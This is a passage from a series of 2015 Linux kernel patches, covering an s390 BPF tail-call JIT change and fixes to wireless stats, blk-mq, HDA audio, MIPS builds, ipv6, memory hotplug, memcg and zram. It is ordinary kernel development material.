With this patch a tail call generates the following code on s390x: if (index >= array->map.max_entries) goto out 000003ff8001c7e4: e31030100016 llgf %r1,16(%r3) 000003ff8001c7ea: ec41001fa065 clgrj %r4,%r1,10,3ff8001c828 if (tail_call_cnt++ > MAX_TAIL_CALL_CNT) goto out; 000003ff8001c7f0: a7080001 lhi %r0,1 000003ff8001c7f4: eb10f25000fa laal %r1,%r0,592(%r15) 000003ff8001c7fa: ec120017207f clij %r1,32,2,3ff8001c828 prog = array->prog[index]; if (prog == NULL) goto out; 000003ff8001c800: eb140003000d sllg %r1,%r4,3 000003ff8001c806: e31310800004 lg %r1,128(%r3,%r1) 000003ff8001c80c: ec18000e007d clgij %r1,0,8,3ff8001c828 Restore registers before calling function 000003ff8001c812: eb68f2980004 lmg %r6,%r8,664(%r15) 000003ff8001c818: ebbff2c00004 lmg %r11,%r15,704(%r15) goto *(prog->bpf_func + tail_call_start); 000003ff8001c81e: e31100200004 lg %r1,32(%r1,%r0) 000003ff8001c824: 47f01006 bc 15,6(%r1) Reviewed-by: Martin Schwidefsky Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- arch/s390/net/bpf_jit.h | 10 +++- arch/s390/net/bpf_jit_comp.c | 106 ++++++++++++++++++++++++++++++++++- 2 files changed, 112 insertions(+), 4 deletions(-) diff --git a/arch/s390/net/bpf_jit.h b/arch/s390/net/bpf_jit.h index de156ba3bd71..f6498eec9ee1 100644 --- a/arch/s390/net/bpf_jit.h +++ b/arch/s390/net/bpf_jit.h @@ -28,6 +28,9 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * | old backchain | | * +---------------+ | * | r15 - r6 | | + * +---------------+ | + * | 4 byte align | | + * | tail_call_cnt | | * BFP -> +===============+ | * | | | * | BPF stack | | @@ -46,14 +49,17 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * R15 -> +---------------+ + low * * We get 160 bytes stack space from calling function, but only use - * 11 * 8 byte (old backchain + r15 - r6) for storing registers. + * 12 * 8 byte for old backchain, r15..r6, and tail_call_cnt. 
*/ #define STK_SPACE (MAX_BPF_STACK + 8 + 4 + 4 + 160) -#define STK_160_UNUSED (160 - 11 * 8) +#define STK_160_UNUSED (160 - 12 * 8) #define STK_OFF (STK_SPACE - STK_160_UNUSED) #define STK_OFF_TMP 160 /* Offset of tmp buffer on stack */ #define STK_OFF_HLEN 168 /* Offset of SKB header length on stack */ +#define STK_OFF_R6 (160 - 11 * 8) /* Offset of r6 on stack */ +#define STK_OFF_TCCNT (160 - 12 * 8) /* Offset of tail_call_cnt on stack */ + /* Offset to skip condition code check */ #define OFF_OK 4 diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c index 55423d8be580..d3766dd67e23 100644 --- a/arch/s390/net/bpf_jit_comp.c +++ b/arch/s390/net/bpf_jit_comp.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include "bpf_jit.h" @@ -40,6 +41,8 @@ struct bpf_jit { int base_ip; /* Base address for literal pool */ int ret0_ip; /* Address of return 0 */ int exit_ip; /* Address of exit */ + int tail_call_start; /* Tail call start offset */ + int labels[1]; /* Labels for local jumps */ }; #define BPF_SIZE_MAX 4096 /* Max size for program */ @@ -49,6 +52,7 @@ struct bpf_jit { #define SEEN_RET0 4 /* ret0_ip points to a valid return 0 */ #define SEEN_LITERAL 8 /* code uses literals */ #define SEEN_FUNC 16 /* calls C functions */ +#define SEEN_TAIL_CALL 32 /* code uses tail calls */ #define SEEN_STACK (SEEN_FUNC | SEEN_MEM | SEEN_SKB) /* @@ -60,6 +64,7 @@ struct bpf_jit { #define REG_L (__MAX_BPF_REG+3) /* Literal pool register */ #define REG_15 (__MAX_BPF_REG+4) /* Register 15 */ #define REG_0 REG_W0 /* Register 0 */ +#define REG_1 REG_W1 /* Register 1 */ #define REG_2 BPF_REG_1 /* Register 2 */ #define REG_14 BPF_REG_0 /* Register 14 */ @@ -223,6 +228,24 @@ static inline void reg_set_seen(struct bpf_jit *jit, u32 b1) REG_SET_SEEN(b3); \ }) +#define EMIT6_PCREL_LABEL(op1, op2, b1, b2, label, mask) \ +({ \ + int rel = (jit->labels[label] - jit->prg) >> 1; \ + _EMIT6(op1 | reg(b1, b2) << 16 | (rel & 0xffff), \ + op2 | mask << 12); \ + REG_SET_SEEN(b1); \ + REG_SET_SEEN(b2); \ +}) + +#define EMIT6_PCREL_IMM_LABEL(op1, op2, b1, imm, label, mask) \ +({ \ + int rel = (jit->labels[label] - jit->prg) >> 1; \ + _EMIT6(op1 | (reg_high(b1) | mask) << 16 | \ + (rel & 0xffff), op2 | (imm & 0xff) << 8); \ + REG_SET_SEEN(b1); \ + BUILD_BUG_ON(((unsigned long) imm) > 0xff); \ +}) + #define EMIT6_PCREL(op1, op2, b1, b2, i, off, mask) \ ({ \ /* Branch instruction needs 6 bytes */ \ @@ -286,7 +309,7 @@ static void jit_fill_hole(void *area, unsigned int size) */ static void save_regs(struct bpf_jit *jit, u32 rs, u32 re) { - u32 off = 72 + (rs - 6) * 8; + u32 off = STK_OFF_R6 + (rs - 6) * 8; if (rs == re) /* stg %rs,off(%r15) */ @@ -301,7 +324,7 @@ static void save_regs(struct bpf_jit *jit, u32 rs, u32 re) */ static void restore_regs(struct bpf_jit *jit, u32 rs, u32 re) { - u32 off = 72 + (rs - 6) * 8; + u32 off = STK_OFF_R6 + (rs - 6) * 8; if (jit->seen & SEEN_STACK) off += STK_OFF; @@ -374,6 +397,16 @@ static void save_restore_regs(struct bpf_jit *jit, int op) */ static void bpf_jit_prologue(struct bpf_jit *jit) { + if (jit->seen & SEEN_TAIL_CALL) { + /* xc STK_OFF_TCCNT(4,%r15),STK_OFF_TCCNT(%r15) */ + _EMIT6(0xd703f000 | STK_OFF_TCCNT, 0xf000 | STK_OFF_TCCNT); + } else { + /* j tail_call_start: NOP if no tail calls are used */ + EMIT4_PCREL(0xa7f40000, 6); + _EMIT2(0); + } + /* Tail calls have to skip above initialization */ + jit->tail_call_start = jit->prg; /* Save registers */ save_restore_regs(jit, REGS_SAVE); /* Setup literal pool */ @@ -951,6 +984,75 @@ static 
noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp, int i EMIT4(0xb9040000, BPF_REG_0, REG_2); break; } + case BPF_JMP | BPF_CALL | BPF_X: + /* + * Implicit input: + * B1: pointer to ctx + * B2: pointer to bpf_array + * B3: index in bpf_array + */ + jit->seen |= SEEN_TAIL_CALL; + + /* + * if (index >= array->map.max_entries) + * goto out; + */ + + /* llgf %w1,map.max_entries(%b2) */ + EMIT6_DISP_LH(0xe3000000, 0x0016, REG_W1, REG_0, BPF_REG_2, + offsetof(struct bpf_array, map.max_entries)); + /* clgrj %b3,%w1,0xa,label0: if %b3 >= %w1 goto out */ + EMIT6_PCREL_LABEL(0xec000000, 0x0065, BPF_REG_3, + REG_W1, 0, 0xa); + + /* + * if (tail_call_cnt++ > MAX_TAIL_CALL_CNT) + * goto out; + */ + + if (jit->seen & SEEN_STACK) + off = STK_OFF_TCCNT + STK_OFF; + else + off = STK_OFF_TCCNT; + /* lhi %w0,1 */ + EMIT4_IMM(0xa7080000, REG_W0, 1); + /* laal %w1,%w0,off(%r15) */ + EMIT6_DISP_LH(0xeb000000, 0x00fa, REG_W1, REG_W0, REG_15, off); + /* clij %w1,MAX_TAIL_CALL_CNT,0x2,label0 */ + EMIT6_PCREL_IMM_LABEL(0xec000000, 0x007f, REG_W1, + MAX_TAIL_CALL_CNT, 0, 0x2); + + /* + * prog = array->prog[index]; + * if (prog == NULL) + * goto out; + */ + + /* sllg %r1,%b3,3: %r1 = index * 8 */ + EMIT6_DISP_LH(0xeb000000, 0x000d, REG_1, BPF_REG_3, REG_0, 3); + /* lg %r1,prog(%b2,%r1) */ + EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, BPF_REG_2, + REG_1, offsetof(struct bpf_array, prog)); + /* clgij %r1,0,0x8,label0 */ + EMIT6_PCREL_IMM_LABEL(0xec000000, 0x007d, REG_1, 0, 0, 0x8); + + /* + * Restore registers before calling function + */ + save_restore_regs(jit, REGS_RESTORE); + + /* + * goto *(prog->bpf_func + tail_call_start); + */ + + /* lg %r1,bpf_func(%r1) */ + EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0, + offsetof(struct bpf_prog, bpf_func)); + /* bc 0xf,tail_call_start(%r1) */ + _EMIT4(0x47f01000 + jit->tail_call_start); + /* out: */ + jit->labels[0] = jit->prg; + break; case BPF_JMP | BPF_EXIT: /* return b0 */ last = (i == fp->len - 1) ? 1 : 0; if (last && !(jit->seen & SEEN_RET0)) From 9c5a18a31b321f120efda412281bb9f610f84aa0 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 9 Jun 2015 21:35:44 +0200 Subject: [PATCH 797/872] cfg80211: wext: clear sinfo struct before calling driver Until recently, mac80211 overwrote all the statistics it could provide when getting called, but it now relies on the struct having been zeroed by the caller. This was always the case in nl80211, but wext used a static struct which could even cause values from one device leak to another. Using a static struct is OK (as even documented in a comment) since the whole usage of this function and its return value is always locked under RTNL. Not clearing the struct for calling the driver has always been wrong though, since drivers were free to only fill values they could report, so calling this for one device and then for another would always have leaked values from one to the other. Fix this by initializing the structure in question before the driver method call. This fixes https://bugzilla.kernel.org/show_bug.cgi?id=99691 Cc: stable@vger.kernel.org Reported-by: Gerrit Renker Reported-by: Alexander Kaltsas Signed-off-by: Johannes Berg Signed-off-by: David S. 
Miller --- net/wireless/wext-compat.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/wireless/wext-compat.c b/net/wireless/wext-compat.c index fff1bef6ed6d..fd682832a0e3 100644 --- a/net/wireless/wext-compat.c +++ b/net/wireless/wext-compat.c @@ -1333,6 +1333,8 @@ static struct iw_statistics *cfg80211_wireless_stats(struct net_device *dev) memcpy(bssid, wdev->current_bss->pub.bssid, ETH_ALEN); wdev_unlock(wdev); + memset(&sinfo, 0, sizeof(sinfo)); + if (rdev_get_station(rdev, dev, bssid, &sinfo)) return NULL; From c3b4afca7023b5aa0531912364246e67f79b3010 Mon Sep 17 00:00:00 2001 From: Ming Lei Date: Thu, 4 Jun 2015 22:25:04 +0800 Subject: [PATCH 798/872] blk-mq: free hctx->ctxs in queue's release handler Now blk_cleanup_queue() can be called before calling del_gendisk()[1], inside which hctx->ctxs is touched from blk_mq_unregister_hctx(), but the variable has been freed by blk_cleanup_queue() at that time. So this patch moves freeing of hctx->ctxs into queue's release handler for fixing the oops reported by Stefan. [1], 6cd18e711dd8075 (block: destroy bdi before blockdev is unregistered) Reported-by: Stefan Seyfried Cc: NeilBrown Cc: Christoph Hellwig Cc: stable@vger.kernel.org (v4.0) Signed-off-by: Ming Lei Signed-off-by: Jens Axboe --- block/blk-mq.c | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/block/blk-mq.c b/block/blk-mq.c index e68b71b85a7e..594eea04266e 100644 --- a/block/blk-mq.c +++ b/block/blk-mq.c @@ -1600,6 +1600,7 @@ static int blk_mq_hctx_notify(void *data, unsigned long action, return NOTIFY_OK; } +/* hctx->ctxs will be freed in queue's release handler */ static void blk_mq_exit_hctx(struct request_queue *q, struct blk_mq_tag_set *set, struct blk_mq_hw_ctx *hctx, unsigned int hctx_idx) @@ -1618,7 +1619,6 @@ static void blk_mq_exit_hctx(struct request_queue *q, blk_mq_unregister_cpu_notifier(&hctx->cpu_notifier); blk_free_flush_queue(hctx->fq); - kfree(hctx->ctxs); blk_mq_free_bitmap(&hctx->ctx_map); } @@ -1891,8 +1891,12 @@ void blk_mq_release(struct request_queue *q) unsigned int i; /* hctx kobj stays in hctx */ - queue_for_each_hw_ctx(q, hctx, i) + queue_for_each_hw_ctx(q, hctx, i) { + if (!hctx) + continue; + kfree(hctx->ctxs); kfree(hctx); + } kfree(q->queue_hw_ctx); From 330f993aa0897aecdd9e20cce81183aeb5eef765 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Wed, 10 Jun 2015 11:01:42 +0900 Subject: [PATCH 799/872] lib: update build parameters for make testbin Signed-off-by: Hajime Tazaki --- tools/testing/libos/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/testing/libos/Makefile b/tools/testing/libos/Makefile index 3da25429382b..a27eb84e7712 100644 --- a/tools/testing/libos/Makefile +++ b/tools/testing/libos/Makefile @@ -19,7 +19,7 @@ testbin: bake check_pkgs cd buildtop ; \ ../bake/bake.py download ; \ ../bake/bake.py update ; \ - ../bake/bake.py build + ../bake/bake.py build $(BAKEBUILD_PARAMS) test: @./dce-test.sh ADD_PARAM=$(ADD_PARAM) From 98a226ed21949601b270f7ea20abc9f72f7b0be9 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 10 Jun 2015 10:27:00 +0200 Subject: [PATCH 800/872] ALSA: hda - Don't actually write registers for caps overwrites Along with the transition to regmap for managing the cached parameter reads, the caps overwrite was also moved to regmap cache. The cache change itself works, but it still tries to write the non-existing verb (the HDA parameter is read-only) wrongly. 
It's harmless in most cases, but some chips are picky and may result in a codec communication stall. This patch avoids it just by adding the missing flag check in reg_write ops. Signed-off-by: Takashi Iwai --- sound/hda/hdac_regmap.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c index 7371e0c3926f..c4f5e61d4404 100644 --- a/sound/hda/hdac_regmap.c +++ b/sound/hda/hdac_regmap.c @@ -265,6 +265,9 @@ static int hda_reg_write(void *context, unsigned int reg, unsigned int val) unsigned int verb; int i, bytes, err; + if (codec->caps_overwriting) + return 0; + reg &= ~0x00080000U; /* drop GET bit */ reg |= (codec->addr << 28); verb = get_verb(reg); From 34b1252bd91851f77f89fbb6829a04efad900f41 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Wed, 10 Jun 2015 10:23:29 +0200 Subject: [PATCH 801/872] MIPS: Cobalt: Do not build MTD platform device registration code as module. If CONFIG_MTD_PHYSMAP is set to m, the Cobalt mtd.ko module might get unloaded while the drivers/mtd modules are still loaded, resulting in stale references to the destroyed platform_device instance. Anyway, platform devices should always be registered indicating what devices are present, _not_ what drivers have been configured. Signed-off-by: Ralf Baechle --- arch/mips/cobalt/Makefile | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/mips/cobalt/Makefile b/arch/mips/cobalt/Makefile index 558e94977942..68f0c5871adc 100644 --- a/arch/mips/cobalt/Makefile +++ b/arch/mips/cobalt/Makefile @@ -2,7 +2,6 @@ # Makefile for the Cobalt micro systems family specific parts of the kernel # -obj-y := buttons.o irq.o lcd.o led.o reset.o rtc.o serial.o setup.o time.o +obj-y := buttons.o irq.o lcd.o led.o mtd.o reset.o rtc.o serial.o setup.o time.o obj-$(CONFIG_PCI) += pci.o -obj-$(CONFIG_MTD_PHYSMAP) += mtd.o From d9fb5660459819513d510e72caa3120a7cf41ee1 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Tue, 9 Jun 2015 09:35:34 +0200 Subject: [PATCH 802/872] MIPS: Loongson: Do not register 8250 platform device from module. If CONFIG_SERIAL_8250 is set to m, the Loongson serial.ko module might get unloaded while the serial driver modules are still loaded, resulting in stale references to the destroyed platform_device instance. Anyway, platform devices should always be registered indicating what devices are present, _not_ what drivers have been configured. Signed-off-by: Ralf Baechle Reported-by: Paul Gortmaker Patchwork: https://patchwork.linux-mips.org/patch/10538/ --- arch/mips/loongson/common/Makefile | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/arch/mips/loongson/common/Makefile b/arch/mips/loongson/common/Makefile index e70c33fdb881..f2e8153e44f5 100644 --- a/arch/mips/loongson/common/Makefile +++ b/arch/mips/loongson/common/Makefile @@ -3,15 +3,13 @@ # obj-y += setup.o init.o cmdline.o env.o time.o reset.o irq.o \ - bonito-irq.o mem.o machtype.o platform.o + bonito-irq.o mem.o machtype.o platform.o serial.o obj-$(CONFIG_PCI) += pci.o # # Serial port support # obj-$(CONFIG_EARLY_PRINTK) += early_printk.o -loongson-serial-$(CONFIG_SERIAL_8250) := serial.o -obj-y += $(loongson-serial-m) $(loongson-serial-y) obj-$(CONFIG_LOONGSON_UART_BASE) += uart_base.o obj-$(CONFIG_LOONGSON_MC146818) += rtc.o From 9cc719ab3f4f639d629ac8ff09e9b998bc006f68 Mon Sep 17 00:00:00 2001 From: Ralf Baechle Date: Sat, 23 May 2015 01:20:19 +0200 Subject: [PATCH 803/872] MIPS: MSA: bugfix - disable MSA correctly for new threads/processes.
Due to the slightly odd way that new threads and processes start execution when scheduled for the very first time, they were bypassing the required disable_msa call. Signed-off-by: Ralf Baechle --- arch/mips/include/asm/switch_to.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/include/asm/switch_to.h b/arch/mips/include/asm/switch_to.h index e92d6c4b5ed1..7163cd7fdd69 100644 --- a/arch/mips/include/asm/switch_to.h +++ b/arch/mips/include/asm/switch_to.h @@ -104,7 +104,6 @@ do { \ if (test_and_clear_tsk_thread_flag(prev, TIF_USEDMSA)) \ __fpsave = FP_SAVE_VECTOR; \ (last) = resume(prev, next, task_thread_info(next), __fpsave); \ - disable_msa(); \ } while (0) #define finish_arch_switch(prev) \ @@ -122,6 +121,7 @@ do { \ if (cpu_has_userlocal) \ write_c0_userlocal(current_thread_info()->tp_value); \ __restore_watch(); \ + disable_msa(); \ } while (0) #endif /* _ASM_SWITCH_TO_H */ From 5eea900389f73ad715649e3c3e78fc4482248635 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Fri, 1 May 2015 05:59:35 -0700 Subject: [PATCH 804/872] blackfin: Fix build error Fix include/asm-generic/io.h: In function 'readb': include/asm-generic/io.h:113:2: error: implicit declaration of function 'bfin_read8' include/asm-generic/io.h: In function 'readw': include/asm-generic/io.h:121:2: error: implicit declaration of function 'bfin_read16' include/asm-generic/io.h: In function 'readl': include/asm-generic/io.h:129:2: error: implicit declaration of function 'bfin_read32' include/asm-generic/io.h: In function 'writeb': include/asm-generic/io.h:147:2: error: implicit declaration of function 'bfin_write8' include/asm-generic/io.h: In function 'writew': include/asm-generic/io.h:155:2: error: implicit declaration of function 'bfin_write16' include/asm-generic/io.h: In function 'writel': include/asm-generic/io.h:163:2: error: implicit declaration of function 'bfin_write32' Reported-by: Geert Uytterhoeven Fixes: 1a3372bc522ef ("blackfin: io: define __raw_readx/writex with bfin_readx/writex") Cc: Steven Miao Signed-off-by: Guenter Roeck --- arch/blackfin/include/asm/io.h | 1 + 1 file changed, 1 insertion(+) diff --git a/arch/blackfin/include/asm/io.h b/arch/blackfin/include/asm/io.h index 4e8ad0523118..6abebe82d4e9 100644 --- a/arch/blackfin/include/asm/io.h +++ b/arch/blackfin/include/asm/io.h @@ -10,6 +10,7 @@ #include #include #include +#include #define __raw_readb bfin_read8 #define __raw_readw bfin_read16 From 80524e933658077842271fbf34e6861c41095a32 Mon Sep 17 00:00:00 2001 From: Guenter Roeck Date: Wed, 15 Apr 2015 08:33:50 -0700 Subject: [PATCH 805/872] score: Fix exception handler label The latest version of modinfo fails to compile score architecture targets with the following error. FATAL: The relocation at __ex_table+0x634 references section "__ex_table" which is not executable, IOW the kernel will fault if it ever tries to jump to it. Something is seriously wrong and should be fixed. The problem is caused by a bad label in an __ex_table entry.
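For context: an exception table entry pairs the address of an instruction that may fault with the address of fixup code the fault handler jumps to, so the fixup label has to point into an executable section such as .fixup, never into the __ex_table data section itself. A generic sketch of the idea (illustrative only, not the score-specific layout):

struct exception_table_entry {
	unsigned long insn;	/* address of the potentially faulting instruction */
	unsigned long fixup;	/* executable recovery code to branch to on a fault */
};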
Acked-by: Lennox Wu Cc: Quentin Casasnovas Signed-off-by: Guenter Roeck --- arch/score/lib/string.S | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/score/lib/string.S b/arch/score/lib/string.S index 00b7d3a2fc60..16efa3ad037f 100644 --- a/arch/score/lib/string.S +++ b/arch/score/lib/string.S @@ -175,10 +175,10 @@ ENTRY(__clear_user) br r3 .section .fixup, "ax" +99: br r3 .previous .section __ex_table, "a" .align 2 -99: .word 0b, 99b .previous From 1b0ccfe54a6abd1bc4d7bdd1c33e61e2c58f72c7 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Wed, 10 Jun 2015 15:29:31 -0700 Subject: [PATCH 806/872] Revert "ipv6: Fix protocol resubmission" This reverts commit 0243508edd317ff1fa63b495643a7c192fbfcd92. It introduces new regressions. Signed-off-by: David S. Miller --- net/ipv6/ip6_input.c | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c index 41a73da371a9..f2e464eba5ef 100644 --- a/net/ipv6/ip6_input.c +++ b/net/ipv6/ip6_input.c @@ -212,13 +212,13 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) */ rcu_read_lock(); +resubmit: idev = ip6_dst_idev(skb_dst(skb)); if (!pskb_pull(skb, skb_transport_offset(skb))) goto discard; nhoff = IP6CB(skb)->nhoff; nexthdr = skb_network_header(skb)[nhoff]; -resubmit: raw = raw6_local_deliver(skb, nexthdr); ipprot = rcu_dereference(inet6_protos[nexthdr]); if (ipprot) { @@ -246,12 +246,10 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) goto discard; ret = ipprot->handler(skb); - if (ret < 0) { - nexthdr = -ret; + if (ret > 0) goto resubmit; - } else if (ret == 0) { + else if (ret == 0) IP6_INC_STATS_BH(net, idev, IPSTATS_MIB_INDELIVERS); - } } else { if (!raw) { if (xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) { From 85bd839983778fcd0c1c043327b14a046e979b39 Mon Sep 17 00:00:00 2001 From: Gu Zheng Date: Wed, 10 Jun 2015 11:14:43 -0700 Subject: [PATCH 807/872] mm/memory_hotplug.c: set zone->wait_table to null after freeing it Izumi found the following oops when hot re-adding a node: BUG: unable to handle kernel paging request at ffffc90008963690 IP: __wake_up_bit+0x20/0x70 Oops: 0000 [#1] SMP CPU: 68 PID: 1237 Comm: rs:main Q:Reg Not tainted 4.1.0-rc5 #80 Hardware name: FUJITSU PRIMEQUEST2800E/SB, BIOS PRIMEQUEST 2000 Series BIOS Version 1.87 04/28/2015 task: ffff880838df8000 ti: ffff880017b94000 task.ti: ffff880017b94000 RIP: 0010:[] [] __wake_up_bit+0x20/0x70 RSP: 0018:ffff880017b97be8 EFLAGS: 00010246 RAX: ffffc90008963690 RBX: 00000000003c0000 RCX: 000000000000a4c9 RDX: 0000000000000000 RSI: ffffea101bffd500 RDI: ffffc90008963648 RBP: ffff880017b97c08 R08: 0000000002000020 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8a0797c73800 R13: ffffea101bffd500 R14: 0000000000000001 R15: 00000000003c0000 FS: 00007fcc7ffff700(0000) GS:ffff880874800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffc90008963690 CR3: 0000000836761000 CR4: 00000000001407e0 Call Trace: unlock_page+0x6d/0x70 generic_write_end+0x53/0xb0 xfs_vm_write_end+0x29/0x80 [xfs] generic_perform_write+0x10a/0x1e0 xfs_file_buffered_aio_write+0x14d/0x3e0 [xfs] xfs_file_write_iter+0x79/0x120 [xfs] __vfs_write+0xd4/0x110 vfs_write+0xac/0x1c0 SyS_write+0x58/0xd0 system_call_fastpath+0x12/0x76 Code: 5d c3 66 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 48 83 ec 20 65 48 8b 04 25 28 00 00 00 48 89 45 f8 31 c0 48 8d 47 48 <48> 39 47 48 48 c7 45 e8 00 00 00 00 48 c7 45 f0 00 00 00 00 48 RIP [] 
__wake_up_bit+0x20/0x70 RSP CR2: ffffc90008963690 Reproduce method (re-add a node):: Hot-add nodeA --> remove nodeA --> hot-add nodeA (panic) This seems an use-after-free problem, and the root cause is zone->wait_table was not set to *NULL* after free it in try_offline_node. When hot re-add a node, we will reuse the pgdat of it, so does the zone struct, and when add pages to the target zone, it will init the zone first (including the wait_table) if the zone is not initialized. The judgement of zone initialized is based on zone->wait_table: static inline bool zone_is_initialized(struct zone *zone) { return !!zone->wait_table; } so if we do not set the zone->wait_table to *NULL* after free it, the memory hotplug routine will skip the init of new zone when hot re-add the node, and the wait_table still points to the freed memory, then we will access the invalid address when trying to wake up the waiting people after the i/o operation with the page is done, such as mentioned above. Signed-off-by: Gu Zheng Reported-by: Taku Izumi Reviewed by: Yasuaki Ishimatsu Cc: KAMEZAWA Hiroyuki Cc: Tang Chen Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memory_hotplug.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c index 457bde530cbe..9e88f749aa51 100644 --- a/mm/memory_hotplug.c +++ b/mm/memory_hotplug.c @@ -1969,8 +1969,10 @@ void try_offline_node(int nid) * wait_table may be allocated from boot memory, * here only free if it's allocated by vmalloc. */ - if (is_vmalloc_addr(zone->wait_table)) + if (is_vmalloc_addr(zone->wait_table)) { vfree(zone->wait_table); + zone->wait_table = NULL; + } } } EXPORT_SYMBOL(try_offline_node); From 7d638093d4b0e9ef15bd78f38f11f126e773cc14 Mon Sep 17 00:00:00 2001 From: Vladimir Davydov Date: Wed, 10 Jun 2015 11:14:46 -0700 Subject: [PATCH 808/872] memcg: do not call reclaim if !__GFP_WAIT When trimming memcg consumption excess (see memory.high), we call try_to_free_mem_cgroup_pages without checking if we are allowed to sleep in the current context, which can result in a deadlock. Fix this. Fixes: 241994ed8649 ("mm: memcontrol: default hierarchy interface for memory") Signed-off-by: Vladimir Davydov Cc: Johannes Weiner Acked-by: Michal Hocko Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memcontrol.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/mm/memcontrol.c b/mm/memcontrol.c index 14c2f2017e37..9da23a7ec4c0 100644 --- a/mm/memcontrol.c +++ b/mm/memcontrol.c @@ -2323,6 +2323,8 @@ static int try_charge(struct mem_cgroup *memcg, gfp_t gfp_mask, css_get_many(&memcg->css, batch); if (batch > nr_pages) refill_stock(memcg, batch - nr_pages); + if (!(gfp_mask & __GFP_WAIT)) + goto done; /* * If the hierarchy is above the normal consumption range, * make the charging task trim their excess contribution. From d7ad41a1c498729b7584c257710b1b437a0c1470 Mon Sep 17 00:00:00 2001 From: Weijie Yang Date: Wed, 10 Jun 2015 11:14:49 -0700 Subject: [PATCH 809/872] zram: clear disk io accounting when reset zram device Clear zram disk io accounting when resetting the zram device. Otherwise the residual io accounting stat will affect the diskstat in the next zram active cycle. 
Signed-off-by: Weijie Yang Acked-by: Sergey Senozhatsky Acked-by: Minchan Kim Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- drivers/block/zram/zram_drv.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/block/zram/zram_drv.c b/drivers/block/zram/zram_drv.c index 8dcbced0eafd..6e134f4759c0 100644 --- a/drivers/block/zram/zram_drv.c +++ b/drivers/block/zram/zram_drv.c @@ -805,7 +805,9 @@ static void zram_reset_device(struct zram *zram) memset(&zram->stats, 0, sizeof(zram->stats)); zram->disksize = 0; zram->max_comp_streams = 1; + set_capacity(zram->disk, 0); + part_stat_set_all(&zram->disk->part0, 0); up_write(&zram->init_lock); /* I/O operation under all of CPU are done so let's free */ From 5129e87cb81996d4d7e8f5a86b5355c5f2d0383b Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Wed, 10 Jun 2015 11:14:52 -0700 Subject: [PATCH 810/872] checkpatch: fix "GLOBAL_INITIALISERS" test Commit d5e616fc1c1d ("checkpatch: add a few more --fix corrections") broke the GLOBAL_INITIALISERS test with bad parentheses and optional leading spaces. Fix it. Signed-off-by: Joe Perches Reported-by: Bandan Das Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- scripts/checkpatch.pl | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scripts/checkpatch.pl b/scripts/checkpatch.pl index 89b1df4e72ab..c5ec977b9c37 100755 --- a/scripts/checkpatch.pl +++ b/scripts/checkpatch.pl @@ -3169,12 +3169,12 @@ sub process { } # check for global initialisers. - if ($line =~ /^\+(\s*$Type\s*$Ident\s*(?:\s+$Modifier))*\s*=\s*(0|NULL|false)\s*;/) { + if ($line =~ /^\+$Type\s*$Ident(?:\s+$Modifier)*\s*=\s*(?:0|NULL|false)\s*;/) { if (ERROR("GLOBAL_INITIALISERS", "do not initialise globals to 0 or NULL\n" . $herecurr) && $fix) { - $fixed[$fixlinenr] =~ s/($Type\s*$Ident\s*(?:\s+$Modifier))*\s*=\s*(0|NULL|false)\s*;/$1;/; + $fixed[$fixlinenr] =~ s/(^.$Type\s*$Ident(?:\s+$Modifier)*)\s*=\s*(0|NULL|false)\s*;/$1;/; } } # check for static initialisers. From f371763a79d5212c2cb216b46fa8af46ba56cee3 Mon Sep 17 00:00:00 2001 From: Johannes Weiner Date: Wed, 10 Jun 2015 11:14:54 -0700 Subject: [PATCH 811/872] mm: memcontrol: fix false-positive VM_BUG_ON() on -rt On -rt, the VM_BUG_ON(!irqs_disabled()) triggers inside the memcg swapout path because the spin_lock_irq(&mapping->tree_lock) in the caller doesn't actually disable the hardware interrupts - which is fine, because on -rt the tophalves run in process context and so we are still safe from preemption while updating the statistics. Remove the VM_BUG_ON() but keep the comment of what we rely on. 
